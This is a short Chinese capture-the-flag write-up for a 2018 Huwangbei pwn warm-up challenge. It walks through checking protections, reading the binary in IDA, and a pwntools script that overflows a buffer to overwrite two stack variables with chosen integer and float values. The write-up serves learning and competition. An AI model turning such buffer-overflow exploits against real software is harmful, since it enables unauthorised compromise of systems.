716°

2018护网杯的pwn签到题(详细过程)

题目:

链接:https://pan.baidu.com/s/1WcO-y2MQ6Wb17PqL2dxyyA
提取码:z5a7

 

首先找保护机制

难受 保护全开!!

 

运行一下,发现只有一个输入点。

 

 

ida分析一波

发现只要满足 v7=0x7FFFFFFFFFFFFFFFLL 还有v8=0.1 但是在payload去传值需要用0x????,这里可以了解一下浮点型  0.1的值:

https://math.stackexchange.com/questions/1791562/converting-0-1-to-binary-64-bit-double?tdsourcetag=s_pctim_aiomsg 

 

或者用c跑一下

 

 

思路:填buf,直到覆盖v7和v8的值,达到成功修改。

 

from pwn import *


p = process('./pwn2')

payload = ''
payload += 'A'*24 + p64(0x7FFFFFFFFFFFFFFF) + p64(0x3FB999999999999A)

p.sendline(payload)
p.interactive()

 

比赛的时候脑子不是很好使,赛后不能再明明白白了。

 

原文链接:https://www.cnblogs.com/z3ro/p/9786742.html

全部评论: 0

    我有话说: